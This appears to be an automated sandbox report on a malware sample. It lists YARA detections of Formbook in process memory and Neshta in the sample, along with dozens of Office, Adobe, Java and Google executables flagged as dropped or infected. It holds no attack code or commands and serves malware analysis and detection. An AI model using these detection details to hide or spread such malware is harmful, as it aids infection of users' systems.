          Source: vi0EwpbUht.exe, 00000003.00000002.480933192.0000000002A20000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs vi0EwpbUht.exe
          Source: vi0EwpbUht.exe, 00000003.00000002.464510666.0000000000ABF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs vi0EwpbUht.exe
          Source: vi0EwpbUht.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: vi0EwpbUht.exe, type: SAMPLEMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000003.395354644.00000000021C4000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_GIF_Anomalies date = 2020-07-02, author = Florian Roth, description = Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type, score = https://en.wikipedia.org/wiki/GIF
          Source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Adobe\ARM\S\11357\AdobeARMHelper.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
          Source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, type: DROPPEDMatched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
